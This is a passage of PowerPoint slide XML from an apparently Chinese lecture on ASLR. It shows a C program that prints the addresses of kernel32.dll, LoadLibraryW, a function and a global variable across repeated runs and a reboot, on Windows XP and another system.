                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>(handle,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>LoadLibraryW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>"</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LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> address: 0x%p\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>pvAddress</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gvar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> address: 0x%p\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>gvar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>"pause"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="13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676350"/>
            <a:ext cx="4824536" cy="372025"/>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第一次运行：</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Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2D080D7-6FF6-C0DC-D5D0-38E493BB29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图片 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{106DAB7E-1B88-8231-EA62-3F2D120E4664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6891202" y="2207761"/>
            <a:ext cx="3810196" cy="1219263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFA79A71-99FB-DE8E-D7BD-AFB94E0BB30A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="3658112"/>
            <a:ext cx="4824536" cy="372025"/>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第二次运行：</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19" name="图片 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A728480F-5E6B-1F64-76AB-3C6A7455B4D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6964265" y="4394780"/>
            <a:ext cx="3810196" cy="1219263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{269752BE-04BA-E082-D942-C45949926B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1155220"/>
            <a:ext cx="35637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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XP</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8837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8" end="1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19" end="1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ASLR</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24631" y="1058913"/>
            <a:ext cx="5403119" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;windows.h&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;stdio.h&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>long</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>gvar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>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PrintAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> address: 0x%p\n"</a:t>
            </a:r>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gvar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>++;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    HINSTANCE handle = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>(TEXT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>"kernel32.dll"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> (!handle) {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"load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> error!"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>         exit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    }</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"kernel32.dll address: 0x%p\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>, handle);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>pvAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>(handle,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>LoadLibraryW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>"</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LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> address: 0x%p\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>pvAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>PrintAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>gvar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> address: 0x%p\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>gvar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>"pause"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>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0A3CBDEB-575B-00AE-A610-AD66DE4EF034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1676350"/>
            <a:ext cx="4824536" cy="372025"/>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第一次运行：</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Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2D080D7-6FF6-C0DC-D5D0-38E493BB291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文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFA79A71-99FB-DE8E-D7BD-AFB94E0BB30A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="3658112"/>
            <a:ext cx="4824536" cy="372025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" kern="0" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>重启系统后</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第二次运行：</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269752BE-04BA-E082-D942-C45949926B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1155220"/>
            <a:ext cx="353975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运行环境：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
